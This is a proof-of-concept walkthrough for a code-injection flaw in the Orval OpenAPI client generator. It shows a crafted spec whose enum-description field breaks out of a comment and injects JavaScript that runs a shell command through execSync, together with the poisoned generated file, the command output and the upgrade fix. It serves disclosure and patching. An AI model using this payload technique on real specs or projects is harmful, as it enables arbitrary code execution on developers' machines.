# Walkthrough: CVE-2026-23947 - Orval Arbitrary Code Execution

This walkthrough demonstrates how an untrusted OpenAPI specification can exploit Orval to inject arbitrary code into generated clients via the `x-enumDescriptions` and `x-enumNames` fields.

## Prerequisites

- Node.js (v20 or v22)
- npm

## Setup

1. Create a project and install a vulnerable version of `orval` (e.g., 7.10.0):

```bash
mkdir orval-poc
cd orval-poc
npm init -y
npm install orval@7.10.0 axios

```

1. Create an `orval.config.js`:

```jsx
module.exports = {
  test: {
    input: './openapi.yaml',
    output: {
      target: './generated/api.ts',
      schemas: './generated/model',
      mode: 'split',
    },
  },
};

```

## Exploit:

1. Create `openapi.yaml` with the following content:

```yaml
openapi: 3.0.0
info:
  title: Test API
  version: 1.0.0
paths:
  /test:
    get:
      responses:
        '200':
          description: OK
          content:
            application/json:
              schema:
                type: object
                properties:
                  status:
                    $ref: '#/components/schemas/TestEnum'
components:
  schemas:
    TestEnum:
      type: string
      enum:
        - VAL1
      x-enumDescriptions:
        - "*/ }; (function(){ const { execSync } = require('child_process'); console.log('ID_COMMAND_OUTPUT: ' + execSync('id').toString()); })(); export const Dummy = { /*"
```

1. Generate the client:

```bash
npx orval

```

1. Observe the generated `generated/model/testEnum.ts`:

```tsx
/**
 * Generated by orval v7.10.0 🍺
 * Do not edit manually.
 * Test API
 * OpenAPI spec version: 1.0.0
 */

export type TestEnum = typeof TestEnum[keyof typeof TestEnum];

// eslint-disable-next-line @typescript-eslint/no-redeclare
export const TestEnum = {
  /** */ }; (function(){ const { execSync } = require('child_process'); console.log('ID_COMMAND_OUTPUT: ' + execSync('id').toString()); })(); export const Dummy = { /* */
  VAL1: 'VAL1',
} as const;

```

## Verification

Create a runner script `exploit.ts`:

```tsx
import { TestEnum } from './generated/model/testEnum';
console.log('TestEnum value:', TestEnum);
```

Run it using `tsx`:

```bash
npm install -D tsx
npx tsx exploit.ts

```

Output:

```
🍻 Start orval v7.10.0 - A swagger client generator for typescript
🎉 test - Your OpenAPI spec has been converted into ready to use orval!
ID_COMMAND_OUTPUT: uid=1002(boroeurn) gid=1002(boroeurn) groups=1002(boroeurn),27(sudo),100(users),126(libvirt),986(docker),993(kvm)

TestEnum value: {}
```

## Remediation

Upgrade Orval to version **8.0.2** or later. The fix properly escapes these strings using `js-string-escape`.
